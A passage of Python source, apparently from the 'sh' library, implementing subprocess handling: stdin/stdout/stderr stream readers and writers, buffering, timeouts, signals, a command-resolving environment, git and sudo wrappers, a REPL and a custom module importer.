if ca["tty_in"] and not stdin_is_tty_or_pipe:
setwinsize(self._stdin_read_fd, ca["tty_size"])
self.log = parent_log.get_child("process", repr(self))
self.log.debug("started process")
# disable echoing, but only if it's a tty that we created ourselves
if ca["tty_in"] and not stdin_is_tty_or_pipe:
attr = termios.tcgetattr(self._stdin_read_fd)
attr[3] &= ~termios.ECHO
termios.tcsetattr(self._stdin_read_fd, termios.TCSANOW, attr)
# we're only going to create a stdin thread iff we have potential
# for stdin to come in. this would be through a stdout callback or
# through an object we've passed in for stdin
potentially_has_input = callable(stdout) or stdin
# this represents the connection from a Queue object (or whatever
# we're using to feed STDIN) to the process's STDIN fd
self._stdin_stream = None
if self._stdin_read_fd and potentially_has_input:
log = self.log.get_child("streamwriter", "stdin")
self._stdin_stream = StreamWriter(log, self._stdin_read_fd,
self.stdin, ca["in_bufsize"], ca["encoding"],
ca["tty_in"])
stdout_pipe = None
if pipe is OProc.STDOUT and not ca["no_pipe"]:
stdout_pipe = self._pipe_queue
# this represents the connection from a process's STDOUT fd to
# wherever it has to go, sometimes a pipe Queue (that we will use
# to pipe data to other processes), and also an internal deque
# that we use to aggregate all the output
save_stdout = not ca["no_out"] and \
(tee_out or stdout is None)
pipe_out = ca["piped"] in ("out", True)
pipe_err = ca["piped"] in ("err",)
# if we're piping directly into another process's filedescriptor, we
# bypass reading from the stdout stream altogether, because we've
# already hooked up this processes's stdout fd to the other
# processes's stdin fd
self._stdout_stream = None
if not pipe_out and self._stdout_read_fd:
if callable(stdout):
stdout = construct_streamreader_callback(self, stdout)
self._stdout_stream = \
StreamReader(
self.log.get_child("streamreader", "stdout"),
self._stdout_read_fd, stdout, self._stdout,
ca["out_bufsize"], ca["encoding"],
ca["decode_errors"], stdout_pipe,
save_data=save_stdout)
elif self._stdout_read_fd:
os.close(self._stdout_read_fd)
# if stderr is going to one place (because it's grouped with stdout,
# or we're dealing with a single tty), then we don't actually need a
# stream reader for stderr, because we've already set one up for
# stdout above
self._stderr_stream = None
if stderr is not OProc.STDOUT and not single_tty and not pipe_err \
and self._stderr_read_fd:
stderr_pipe = None
if pipe is OProc.STDERR and not ca["no_pipe"]:
stderr_pipe = self._pipe_queue
save_stderr = not ca["no_err"] and \
(ca["tee"] in ("err",) or stderr is None)
if callable(stderr):
stderr = construct_streamreader_callback(self, stderr)
self._stderr_stream = StreamReader(Logger("streamreader"),
self._stderr_read_fd, stderr, self._stderr,
ca["err_bufsize"], ca["encoding"], ca["decode_errors"],
stderr_pipe, save_data=save_stderr)
elif self._stderr_read_fd:
os.close(self._stderr_read_fd)
def timeout_fn():
self.timed_out = True
self.signal(ca["timeout_signal"])
self._timeout_event = None
self._timeout_timer = None
if ca["timeout"]:
self._timeout_event = threading.Event()
self._timeout_timer = threading.Timer(ca["timeout"],
self._timeout_event.set)
self._timeout_timer.start()
# this is for cases where we know that the RunningCommand that was
# launched was not .wait()ed on to complete. in those unique cases,
# we allow the thread that processes output to report exceptions in
# that thread. it's important that we only allow reporting of the
# exception, and nothing else (like the additional stuff that
# RunningCommand.wait() does), because we want the exception to be
# re-raised in the future, if we DO call .wait()
handle_exit_code = None
if not self.command._spawned_and_waited and ca["bg_exc"]:
def fn(exit_code):
with process_assign_lock:
return self.command.handle_command_exit_code(exit_code)
handle_exit_code = fn
self._quit_threads = threading.Event()
thread_name = "background thread for pid %d" % self.pid
self._bg_thread_exc_queue = Queue(1)
self._background_thread = _start_daemon_thread(background_thread,
thread_name, self._bg_thread_exc_queue, timeout_fn,
self._timeout_event, handle_exit_code, self.is_alive,
self._quit_threads)
# start the main io threads. stdin thread is not needed if we are
# connecting from another process's stdout pipe
self._input_thread = None
self._input_thread_exc_queue = Queue(1)
if self._stdin_stream:
close_before_term = not needs_ctty
thread_name = "STDIN thread for pid %d" % self.pid
self._input_thread = _start_daemon_thread(input_thread,
thread_name, self._input_thread_exc_queue, self.log,
self._stdin_stream, self.is_alive, self._quit_threads,
close_before_term)
# this event is for cases where the subprocess that we launch
# launches its OWN subprocess and dups the stdout/stderr fds to that
# new subprocess. in that case, stdout and stderr will never EOF,
# so our output_thread will never finish and will hang. this event
# prevents that hanging
self._stop_output_event = threading.Event()
self._output_thread_exc_queue = Queue(1)
thread_name = "STDOUT/ERR thread for pid %d" % self.pid
self._output_thread = _start_daemon_thread(output_thread,
thread_name, self._output_thread_exc_queue, self.log,
self._stdout_stream, self._stderr_stream,
self._timeout_event, self.is_alive, self._quit_threads,
self._stop_output_event)
def __repr__(self):
return "<Process %d %r>" % (self.pid, self.cmd[:500])
# these next 3 properties are primary for tests
@property
def output_thread_exc(self):
exc = None
try:
exc = self._output_thread_exc_queue.get(False)
except Empty:
pass
return exc
@property
def input_thread_exc(self):
exc = None
try:
exc = self._input_thread_exc_queue.get(False)
except Empty:
pass
return exc
@property
def bg_thread_exc(self):
exc = None
try:
exc = self._bg_thread_exc_queue.get(False)
except Empty:
pass
return exc
def change_in_bufsize(self, buf):
self._stdin_stream.stream_bufferer.change_buffering(buf)
def change_out_bufsize(self, buf):
self._stdout_stream.stream_bufferer.change_buffering(buf)
def change_err_bufsize(self, buf):
self._stderr_stream.stream_bufferer.change_buffering(buf)
@property
def stdout(self):
return "".encode(self.call_args["encoding"]).join(self._stdout)
@property
def stderr(self):
return "".encode(self.call_args["encoding"]).join(self._stderr)
def get_pgid(self):
""" return the CURRENT group id of the process. this differs from
self.pgid in that this reflects the current state of the process, where
self.pgid is the group id at launch """
return os.getpgid(self.pid)
def get_sid(self):
""" return the CURRENT session id of the process. this differs from
self.sid in that this reflects the current state of the process, where
self.sid is the session id at launch """
return os.getsid(self.pid)
def signal_group(self, sig):
self.log.debug("sending signal %d to group", sig)
os.killpg(self.get_pgid(), sig)
def signal(self, sig):
self.log.debug("sending signal %d", sig)
os.kill(self.pid, sig)
def kill_group(self):
self.log.debug("killing group")
self.signal_group(signal.SIGKILL)
def kill(self):
self.log.debug("killing")
self.signal(signal.SIGKILL)
def terminate(self):
self.log.debug("terminating")
self.signal(signal.SIGTERM)
def is_alive(self):
""" polls if our child process has completed, without blocking. this
method has side-effects, such as setting our exit_code, if we happen to
see our child exit while this is running """
if self.exit_code is not None:
return False, self.exit_code
# what we're doing here essentially is making sure that the main thread
# (or another thread), isn't calling .wait() on the process. because
# .wait() calls os.waitpid(self.pid, 0), we can't do an os.waitpid
# here...because if we did, and the process exited while in this
# thread, the main thread's os.waitpid(self.pid, 0) would raise OSError
# (because the process ended in another thread).
#
# so essentially what we're doing is, using this lock, checking if
# we're calling .wait(), and if we are, let .wait() get the exit code
# and handle the status, otherwise let us do it.
acquired = self._wait_lock.acquire(False)
if not acquired:
if self.exit_code is not None:
return False, self.exit_code
return True, self.exit_code
try:
# WNOHANG is just that...we're calling waitpid without hanging...
# essentially polling the process. the return result is (0, 0) if
# there's no process status, so we check that pid == self.pid below
# in order to determine how to proceed
pid, exit_code = no_interrupt(os.waitpid, self.pid, os.WNOHANG)
if pid == self.pid:
self.exit_code = handle_process_exit_code(exit_code)
self._process_just_ended()
return False, self.exit_code
# no child process
except OSError:
return False, self.exit_code
else:
return True, self.exit_code
finally:
self._wait_lock.release()
def _process_just_ended(self):
if self._timeout_timer:
self._timeout_timer.cancel()
done_callback = self.call_args["done"]
if done_callback:
success = self.exit_code in self.call_args["ok_code"]
done_callback(success, self.exit_code)
# this can only be closed at the end of the process, because it might be
# the CTTY, and closing it prematurely will send a SIGHUP. we also
# don't want to close it if there's a self._stdin_stream, because that
# is in charge of closing it also
if self._stdin_read_fd and not self._stdin_stream:
os.close(self._stdin_read_fd)
def wait(self):
""" waits for the process to complete, handles the exit code """
self.log.debug("acquiring wait lock to wait for completion")
# using the lock in a with-context blocks, which is what we want if
# we're running wait()
with self._wait_lock:
self.log.debug("got wait lock")
witnessed_end = False
if self.exit_code is None:
self.log.debug("exit code not set, waiting on pid")
pid, exit_code = no_interrupt(os.waitpid, self.pid, 0) # blocks
self.exit_code = handle_process_exit_code(exit_code)
witnessed_end = True
else:
self.log.debug("exit code already set (%d), no need to wait",
self.exit_code)
self._quit_threads.set()
# we may not have a thread for stdin, if the pipe has been connected
# via _piped="direct"
if self._input_thread:
self._input_thread.join()
# wait, then signal to our output thread that the child process is
# done, and we should have finished reading all the stdout/stderr
# data that we can by now
timer = threading.Timer(2.0, self._stop_output_event.set)
timer.start()
# wait for our stdout and stderr streamreaders to finish reading and
# aggregating the process output
self._output_thread.join()
timer.cancel()
self._background_thread.join()
if witnessed_end:
self._process_just_ended()
return self.exit_code
def input_thread(log, stdin, is_alive, quit, close_before_term):
""" this is run in a separate thread. it writes into our process's
stdin (a streamwriter) and waits the process to end AND everything that
can be written to be written """
done = False
closed = False
alive = True
poller = Poller()
poller.register_write(stdin)
while poller and alive:
changed = poller.poll(1)
for fd, events in changed:
if events & (POLLER_EVENT_WRITE | POLLER_EVENT_HUP):
log.debug("%r ready for more input", stdin)
done = stdin.write()
if done:
poller.unregister(stdin)
if close_before_term:
stdin.close()
closed = True
alive, _ = is_alive()
while alive:
quit.wait(1)
alive, _ = is_alive()
if not closed:
stdin.close()
def event_wait(ev, timeout=None):
triggered = ev.wait(timeout)
if IS_PY26:
triggered = ev.is_set()
return triggered
def background_thread(timeout_fn, timeout_event, handle_exit_code, is_alive,
quit):
""" handles the timeout logic """
# if there's a timeout event, loop
if timeout_event:
while not quit.is_set():
timed_out = event_wait(timeout_event, 0.1)
if timed_out:
timeout_fn()
break
# handle_exit_code will be a function ONLY if our command was NOT waited on
# as part of its spawning. in other words, it's probably a background
# command
#
# this reports the exit code exception in our thread. it's purely for the
# user's awareness, and cannot be caught or used in any way, so it's ok to
# suppress this during the tests
if handle_exit_code and not RUNNING_TESTS: # pragma: no cover
alive = True
while alive:
quit.wait(1)
alive, exit_code = is_alive()
handle_exit_code(exit_code)
def output_thread(log, stdout, stderr, timeout_event, is_alive, quit,
stop_output_event):
""" this function is run in a separate thread. it reads from the
process's stdout stream (a streamreader), and waits for it to claim that
its done """
poller = Poller()
if stdout is not None:
poller.register_read(stdout)
if stderr is not None:
poller.register_read(stderr)
# this is our poll loop for polling stdout or stderr that is ready to
# be read and processed. if one of those streamreaders indicate that it
# is done altogether being read from, we remove it from our list of
# things to poll. when no more things are left to poll, we leave this
# loop and clean up
while poller:
changed = no_interrupt(poller.poll, 0.1)
for f, events in changed:
if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
log.debug("%r ready to be read from", f)
done = f.read()
if done:
poller.unregister(f)
elif events & POLLER_EVENT_ERROR:
# for some reason, we have to just ignore streams that have had an
# error. i'm not exactly sure why, but don't remove this until we
# figure that out, and create a test for it
pass
if timeout_event and timeout_event.is_set():
break
if stop_output_event.is_set():
break
# we need to wait until the process is guaranteed dead before closing our
# outputs, otherwise SIGPIPE
alive, _ = is_alive()
while alive:
quit.wait(1)
alive, _ = is_alive()
if stdout:
stdout.close()
if stderr:
stderr.close()
class DoneReadingForever(Exception): pass
class NotYetReadyToRead(Exception): pass
def determine_how_to_read_input(input_obj):
""" given some kind of input object, return a function that knows how to
read chunks of that input object.
each reader function should return a chunk and raise a DoneReadingForever
exception, or return None, when there's no more data to read
NOTE: the function returned does not need to care much about the requested
buffering type (eg, unbuffered vs newline-buffered). the StreamBufferer
will take care of that. these functions just need to return a
reasonably-sized chunk of data. """
get_chunk = None
if isinstance(input_obj, Queue):
log_msg = "queue"
get_chunk = get_queue_chunk_reader(input_obj)
elif callable(input_obj):
log_msg = "callable"
get_chunk = get_callable_chunk_reader(input_obj)
# also handles stringio
elif hasattr(input_obj, "read"):
log_msg = "file descriptor"
get_chunk = get_file_chunk_reader(input_obj)
elif isinstance(input_obj, basestring):
log_msg = "string"
get_chunk = get_iter_string_reader(input_obj)
elif isinstance(input_obj, bytes):
log_msg = "bytes"
get_chunk = get_iter_string_reader(input_obj)
elif isinstance(input_obj, GeneratorType):
log_msg = "generator"
get_chunk = get_iter_chunk_reader(iter(input_obj))
else:
try:
it = iter(input_obj)
except TypeError:
raise Exception("unknown input object")
else:
log_msg = "general iterable"
get_chunk = get_iter_chunk_reader(it)
return get_chunk, log_msg
def get_queue_chunk_reader(stdin):
def fn():
try:
chunk = stdin.get(True, 0.1)
except Empty:
raise NotYetReadyToRead
if chunk is None:
raise DoneReadingForever
return chunk
return fn
def get_callable_chunk_reader(stdin):
def fn():
try:
data = stdin()
except DoneReadingForever:
raise
if not data:
raise DoneReadingForever
return data
return fn
def get_iter_string_reader(stdin):
""" return an iterator that returns a chunk of a string every time it is
called. notice that even though bufsize_type might be line buffered, we're
not doing any line buffering here. that's because our StreamBufferer
handles all buffering. we just need to return a reasonable-sized chunk. """
bufsize = 1024
iter_str = (stdin[i:i + bufsize] for i in range(0, len(stdin), bufsize))
return get_iter_chunk_reader(iter_str)
def get_iter_chunk_reader(stdin):
def fn():
try:
if IS_PY3:
chunk = stdin.__next__()
else:
chunk = stdin.next()
return chunk
except StopIteration:
raise DoneReadingForever
return fn
def get_file_chunk_reader(stdin):
bufsize = 1024
def fn():
# python 3.* includes a fileno on stringios, but accessing it throws an
# exception. that exception is how we'll know we can't do a poll on
# stdin
is_real_file = True
if IS_PY3:
try:
stdin.fileno()
except UnsupportedOperation:
is_real_file = False
# this poll is for files that may not yet be ready to read. we test
# for fileno because StringIO/BytesIO cannot be used in a poll
if is_real_file and hasattr(stdin, "fileno"):
poller = Poller()
poller.register_read(stdin)
changed = poller.poll(0.1)
ready = False
for fd, events in changed:
if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
ready = True
if not ready:
raise NotYetReadyToRead
chunk = stdin.read(bufsize)
if not chunk:
raise DoneReadingForever
else:
return chunk
return fn
def bufsize_type_to_bufsize(bf_type):
""" for a given bufsize type, return the actual bufsize we will read.
notice that although 1 means "newline-buffered", we're reading a chunk size
of 1024. this is because we have to read something. we let a
StreamBufferer instance handle splitting our chunk on newlines """
# newlines
if bf_type == 1:
bufsize = 1024
# unbuffered
elif bf_type == 0:
bufsize = 1
# or buffered by specific amount
else:
bufsize = bf_type
return bufsize
class StreamWriter(object):
""" StreamWriter reads from some input (the stdin param) and writes to a fd
(the stream param). the stdin may be a Queue, a callable, something with
the "read" method, a string, or an iterable """
def __init__(self, log, stream, stdin, bufsize_type, encoding, tty_in):
self.stream = stream
self.stdin = stdin
self.log = log
self.encoding = encoding
self.tty_in = tty_in
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding)
self.get_chunk, log_msg = determine_how_to_read_input(stdin)
self.log.debug("parsed stdin as a %s", log_msg)
def fileno(self):
""" defining this allows us to do poll on an instance of this
class """
return self.stream
def write(self):
""" attempt to get a chunk of data to write to our child process's
stdin, then write it. the return value answers the questions "are we
done writing forever?" """
# get_chunk may sometimes return bytes, and sometimes return strings
# because of the nature of the different types of STDIN objects we
# support
try:
chunk = self.get_chunk()
if chunk is None:
raise DoneReadingForever
except DoneReadingForever:
self.log.debug("done reading")
if self.tty_in:
# EOF time
try:
char = termios.tcgetattr(self.stream)[6][termios.VEOF]
except:
char = chr(4).encode()
# normally, one EOF should be enough to signal to an program
# that is read()ing, to return 0 and be on your way. however,
# some programs are misbehaved, like python3.1 and python3.2.
# they don't stop reading sometimes after read() returns 0.
# this can be demonstrated with the following program:
#
# import sys
# sys.stdout.write(sys.stdin.read())
#
# then type 'a' followed by ctrl-d 3 times. in python
# 2.6,2.7,3.3,3.4,3.5,3.6, it only takes 2 ctrl-d to terminate.
# however, in python 3.1 and 3.2, it takes all 3.
#
# so here we send an extra EOF along, just in case. i don't
# believe it can hurt anything
os.write(self.stream, char)
os.write(self.stream, char)
return True
except NotYetReadyToRead:
self.log.debug("received no data")
return False
# if we're not bytes, make us bytes
if IS_PY3 and hasattr(chunk, "encode"):
chunk = chunk.encode(self.encoding)
for proc_chunk in self.stream_bufferer.process(chunk):
self.log.debug("got chunk size %d: %r", len(proc_chunk),
proc_chunk[:30])
self.log.debug("writing chunk to process")
try:
os.write(self.stream, proc_chunk)
except OSError:
self.log.debug("OSError writing stdin chunk")
return True
def close(self):
self.log.debug("closing, but flushing first")
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
try:
if chunk:
os.write(self.stream, chunk)
except OSError:
pass
os.close(self.stream)
def determine_how_to_feed_output(handler, encoding, decode_errors):
if callable(handler):
process, finish = get_callback_chunk_consumer(handler, encoding,
decode_errors)
# in py3, this is used for bytes
elif isinstance(handler, (cStringIO, iocStringIO)):
process, finish = get_cstringio_chunk_consumer(handler)
# in py3, this is used for unicode
elif isinstance(handler, (StringIO, ioStringIO)):
process, finish = get_stringio_chunk_consumer(handler, encoding,
decode_errors)
elif hasattr(handler, "write"):
process, finish = get_file_chunk_consumer(handler)
else:
try:
handler = int(handler)
except (ValueError, TypeError):
process = lambda chunk: False
finish = lambda: None
else:
process, finish = get_fd_chunk_consumer(handler)
return process, finish
def get_fd_chunk_consumer(handler):
handler = fdopen(handler, "w", closefd=False)
return get_file_chunk_consumer(handler)
def get_file_chunk_consumer(handler):
encode = lambda chunk: chunk
if getattr(handler, "encoding", None):
encode = lambda chunk: chunk.decode(handler.encoding)
flush = lambda: None
if hasattr(handler, "flush"):
flush = handler.flush
def process(chunk):
handler.write(encode(chunk))
# we should flush on an fd. chunk is already the correctly-buffered
# size, so we don't need the fd buffering as well
flush()
return False
def finish():
flush()
return process, finish
def get_callback_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
# try to use the encoding first, if that doesn't work, send
# the bytes, because it might be binary
try:
chunk = chunk.decode(encoding, decode_errors)
except UnicodeDecodeError:
pass
return handler(chunk)
def finish():
pass
return process, finish
def get_cstringio_chunk_consumer(handler):
def process(chunk):
handler.write(chunk)
return False
def finish():
pass
return process, finish
def get_stringio_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
handler.write(chunk.decode(encoding, decode_errors))
return False
def finish():
pass
return process, finish
class StreamReader(object):
""" reads from some output (the stream) and sends what it just read to the
handler. """
def __init__(self, log, stream, handler, buffer, bufsize_type, encoding,
decode_errors, pipe_queue=None, save_data=True):
self.stream = stream
self.buffer = buffer
self.save_data = save_data
self.encoding = encoding
self.decode_errors = decode_errors
self.pipe_queue = None
if pipe_queue:
self.pipe_queue = weakref.ref(pipe_queue)
self.log = log
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding,
self.decode_errors)
self.bufsize = bufsize_type_to_bufsize(bufsize_type)
self.process_chunk, self.finish_chunk_processor = \
determine_how_to_feed_output(handler, encoding, decode_errors)
self.should_quit = False
def fileno(self):
""" defining this allows us to do poll on an instance of this
class """
return self.stream
def close(self):
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
if chunk:
self.write_chunk(chunk)
self.finish_chunk_processor()
if self.pipe_queue and self.save_data:
self.pipe_queue().put(None)
os.close(self.stream)
def write_chunk(self, chunk):
# in PY3, the chunk coming in will be bytes, so keep that in mind
if not self.should_quit:
self.should_quit = self.process_chunk(chunk)
if self.save_data:
self.buffer.append(chunk)
if self.pipe_queue:
self.log.debug("putting chunk onto pipe: %r", chunk[:30])
self.pipe_queue().put(chunk)
def read(self):
# if we're PY3, we're reading bytes, otherwise we're reading
# str
try:
chunk = no_interrupt(os.read, self.stream, self.bufsize)
except OSError as e:
self.log.debug("got errno %d, done reading", e.errno)
return True
if not chunk:
self.log.debug("got no chunk, done reading")
return True
self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30])
for chunk in self.stream_bufferer.process(chunk):
self.write_chunk(chunk)
class StreamBufferer(object):
""" this is used for feeding in chunks of stdout/stderr, and breaking it up
into chunks that will actually be put into the internal buffers. for
example, if you have two processes, one being piped to the other, and you
want that, first process to feed lines of data (instead of the chunks
however they come in), OProc will use an instance of this class to chop up
the data and feed it as lines to be sent down the pipe """
def __init__(self, buffer_type, encoding=DEFAULT_ENCODING,
decode_errors="strict"):
# 0 for unbuffered, 1 for line, everything else for that amount
self.type = buffer_type
self.buffer = []
self.n_buffer_count = 0
self.encoding = encoding
self.decode_errors = decode_errors
# this is for if we change buffering types. if we change from line
# buffered to unbuffered, its very possible that our self.buffer list
# has data that was being saved up (while we searched for a newline).
# we need to use that up, so we don't lose it
self._use_up_buffer_first = False
# the buffering lock is used because we might change the buffering
# types from a different thread. for example, if we have a stdout
# callback, we might use it to change the way stdin buffers. so we
# lock
self._buffering_lock = threading.RLock()
self.log = Logger("stream_bufferer")
def change_buffering(self, new_type):
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock for changing buffering")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for changing buffering")
try:
if new_type == 0:
self._use_up_buffer_first = True
self.type = new_type
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for changing buffering")
def process(self, chunk):
# MAKE SURE THAT THE INPUT IS PY3 BYTES
# THE OUTPUT IS ALWAYS PY3 BYTES
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock to process chunk (buffering: %d)", self.type)
self._buffering_lock.acquire()
self.log.debug("got buffering lock to process chunk (buffering: %d)", self.type)
try:
# unbuffered
if self.type == 0:
if self._use_up_buffer_first:
self._use_up_buffer_first = False
to_write = self.buffer
self.buffer = []
to_write.append(chunk)
return to_write
return [chunk]
# line buffered
elif self.type == 1:
total_to_write = []
nl = "\n".encode(self.encoding)
while True:
newline = chunk.find(nl)
if newline == -1:
break
chunk_to_write = chunk[:newline + 1]
if self.buffer:
chunk_to_write = b"".join(self.buffer) + chunk_to_write
self.buffer = []
self.n_buffer_count = 0
chunk = chunk[newline + 1:]
total_to_write.append(chunk_to_write)
if chunk:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
return total_to_write
# N size buffered
else:
total_to_write = []
while True:
overage = self.n_buffer_count + len(chunk) - self.type
if overage >= 0:
ret = "".encode(self.encoding).join(self.buffer) + chunk
chunk_to_write = ret[:self.type]
chunk = ret[self.type:]
total_to_write.append(chunk_to_write)
self.buffer = []
self.n_buffer_count = 0
else:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
break
return total_to_write
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for processing chunk (buffering: %d)", self.type)
def flush(self):
self.log.debug("acquiring buffering lock for flushing buffer")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for flushing buffer")
try:
ret = "".encode(self.encoding).join(self.buffer)
self.buffer = []
return ret
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for flushing buffer")
def with_lock(lock):
def wrapped(fn):
fn = contextmanager(fn)
@contextmanager
def wrapped2(*args, **kwargs):
with lock:
with fn(*args, **kwargs):
yield
return wrapped2
return wrapped
@with_lock(PUSHD_LOCK)
def pushd(path):
""" pushd changes the actual working directory for the duration of the
context, unlike the _cwd arg this will work with other built-ins such as
sh.glob correctly """
orig_path = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(orig_path)
@contextmanager
def args(**kwargs):
""" allows us to temporarily override all the special keyword parameters in
a with context """
kwargs_str = ",".join(["%s=%r" % (k,v) for k,v in kwargs.items()])
raise DeprecationWarning("""
sh.args() has been deprecated because it was never thread safe. use the
following instead:
sh2 = sh({kwargs})
sh2.your_command()
or
sh2 = sh({kwargs})
from sh2 import your_command
your_command()
""".format(kwargs=kwargs_str))
class Environment(dict):
""" this allows lookups to names that aren't found in the global scope to be
searched for as a program name. for example, if "ls" isn't found in this
module's scope, we consider it a system program and try to find it.
we use a dict instead of just a regular object as the base class because the
exec() statement used in the run_repl requires the "globals" argument to be a
dictionary """
# this is a list of all of the names that the sh module exports that will
# not resolve to functions. we don't want to accidentally shadow real
# commands with functions/imports that we define in sh.py. for example,
# "import time" may override the time system program
whitelist = set([
"Command",
"RunningCommand",
"CommandNotFound",
"DEFAULT_ENCODING",
"DoneReadingForever",
"ErrorReturnCode",
"NotYetReadyToRead",
"SignalException",
"ForkException",
"TimeoutException",
"__project_url__",
"__version__",
"__file__",
"args",
"pushd",
"glob",
"contrib",
])
def __init__(self, globs, baked_args={}):
""" baked_args are defaults for the 'sh' execution context. for
example:
tmp = sh(_out=StringIO())
'out' would end up in here as an entry in the baked_args dict """
self.globs = globs
self.baked_args = baked_args
self.disable_whitelist = False
def __getitem__(self, k):
# if we first import "_disable_whitelist" from sh, we can import
# anything defined in the global scope of sh.py. this is useful for our
# tests
if k == "_disable_whitelist":
self.disable_whitelist = True
return None
# we're trying to import something real (maybe), see if it's in our
# global scope
if k in self.whitelist or self.disable_whitelist:
return self.globs[k]
# somebody tried to be funny and do "from sh import *"
if k == "__all__":
warnings.warn("Cannot import * from sh. Please import sh or import programs individually.")
return []
# check if we're naming a dynamically generated ReturnCode exception
exc = get_exc_from_name(k)
if exc:
return exc
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
if k.startswith("__") and k.endswith("__"):
raise AttributeError
# is it a custom builtin?
builtin = getattr(self, "b_" + k, None)
if builtin:
return builtin
# is it a command?
cmd = resolve_command(k, self.baked_args)
if cmd:
return cmd
# how about an environment variable?
# this check must come after testing if its a command, because on some
# systems, there are an environment variables that can conflict with
# command names.
# https://github.com/amoffat/sh/issues/238
try:
return os.environ[k]
except KeyError:
pass
# nothing found, raise an exception
raise CommandNotFound(k)
# methods that begin with "b_" are custom builtins and will override any
# program that exists in our path. this is useful for things like
# common shell builtins that people are used to, but which aren't actually
# full-fledged system binaries
def b_cd(self, path=None):
if path:
os.chdir(path)
else:
os.chdir(os.path.expanduser('~'))
def b_which(self, program, paths=None):
return which(program, paths)
class Contrib(ModuleType): # pragma: no cover
@classmethod
def __call__(cls, name):
def wrapper1(fn):
@property
def cmd_getter(self):
cmd = resolve_command(name)
if not cmd:
raise CommandNotFound(name)
new_cmd = fn(cmd)
return new_cmd
setattr(cls, name, cmd_getter)
return fn
return wrapper1
mod_name = __name__ + ".contrib"
contrib = Contrib(mod_name)
sys.modules[mod_name] = contrib
@contrib("git")
def git(orig): # pragma: no cover
""" most git commands play nicer without a TTY """
cmd = orig.bake(_tty_out=False)
return cmd
@contrib("sudo")
def sudo(orig): # pragma: no cover
""" a nicer version of sudo that uses getpass to ask for a password, or
allows the first argument to be a string password """
prompt = "[sudo] password for %s: " % getpass.getuser()
def stdin():
pw = getpass.getpass(prompt=prompt) + "\n"
yield pw
def process(args, kwargs):
password = kwargs.pop("password", None)
if password is None:
pass_getter = stdin()
else:
pass_getter = password.rstrip("\n") + "\n"
kwargs["_in"] = pass_getter
return args, kwargs
cmd = orig.bake("-S", _arg_preprocess=process)
return cmd
def run_repl(env): # pragma: no cover
banner = "\n>> sh v{version}\n>> https://github.com/amoffat/sh\n"
print(banner.format(version=__version__))
while True:
try:
line = raw_input("sh> ")
except (ValueError, EOFError):
break
try:
exec(compile(line, "<dummy>", "single"), env, env)
except SystemExit:
break
except:
print(traceback.format_exc())
# cleans up our last line
print("")
# this is a thin wrapper around THIS module (we patch sys.modules[__name__]).
# this is in the case that the user does a "from sh import whatever"
# in other words, they only want to import certain programs, not the whole
# system PATH worth of commands. in this case, we just proxy the
# import lookup to our Environment class
class SelfWrapper(ModuleType):
def __init__(self, self_module, baked_args={}):
# this is super ugly to have to copy attributes like this,
# but it seems to be the only way to make reload() behave
# nicely. if i make these attributes dynamic lookups in
# __getattr__, reload sometimes chokes in weird ways...
for attr in ["__builtins__", "__doc__", "__file__", "__name__", "__package__"]:
setattr(self, attr, getattr(self_module, attr, None))
# python 3.2 (2.7 and 3.3 work fine) breaks on osx (not ubuntu)
# if we set this to None. and 3.3 needs a value for __path__
self.__path__ = []
self.__self_module = self_module
self.__env = Environment(globals(), baked_args=baked_args)
def __getattr__(self, name):
return self.__env[name]
def __call__(self, **kwargs):
""" returns a new SelfWrapper object, where all commands spawned from it
have the baked_args kwargs set on them by default """
baked_args = self.__env.baked_args.copy()
baked_args.update(kwargs)
new_mod = self.__class__(self.__self_module, baked_args)
# inspect the line in the parent frame that calls and assigns the new sh
# variable, and get the name of the new variable we're assigning to.
# this is very brittle and pretty much a sin. but it works in 99% of
# the time and the tests pass
#
# the reason we need to do this is because we need to remove the old
# cached module from sys.modules. if we don't, it gets re-used, and any
# old baked params get used, which is not what we want
parent = inspect.stack()[1]
code = parent[4][0].strip()
parsed = ast.parse(code)
module_name = parsed.body[0].targets[0].id
if module_name == __name__:
raise RuntimeError("Cannot use the name 'sh' as an execution context")
sys.modules.pop(module_name, None)
return new_mod
def in_importlib(frame):
""" helper for checking if a filename is in importlib guts """
return frame.f_code.co_filename == "<frozen importlib._bootstrap>"
def register_importer():
""" registers our fancy importer that can let us import from a module name,
like:
import sh
tmp = sh()
from tmp import ls
"""
def test(importer):
return importer.__class__.__name__ == ModuleImporterFromVariables.__name__
already_registered = any([True for i in sys.meta_path if test(i)])
if not already_registered:
importer = ModuleImporterFromVariables(
restrict_to=["SelfWrapper"],
)
sys.meta_path.insert(0, importer)
return not already_registered
def fetch_module_from_frame(name, frame):
mod = frame.f_locals.get(name, frame.f_globals.get(name, None))
return mod
class ModuleImporterFromVariables(object):
""" a fancy importer that allows us to import from a variable that was
recently set in either the local or global scope, like this:
sh2 = sh(_timeout=3)
from sh2 import ls
"""
def __init__(self, restrict_to=None):
self.restrict_to = set(restrict_to or set())
def find_module(self, mod_fullname, path=None):
""" mod_fullname doubles as the name of the VARIABLE holding our new sh
context. for example:
derp = sh()
from derp import ls
here, mod_fullname will be "derp". keep that in mind as we go through
the rest of this function """
parent_frame = inspect.currentframe().f_back
while in_importlib(parent_frame):
parent_frame = parent_frame.f_back
# this line is saying "hey, does mod_fullname exist as a name we've
# defind previously?" the purpose of this is to ensure that
# mod_fullname is really a thing we've defined. if we haven't defined
# it before, then we "can't" import from it
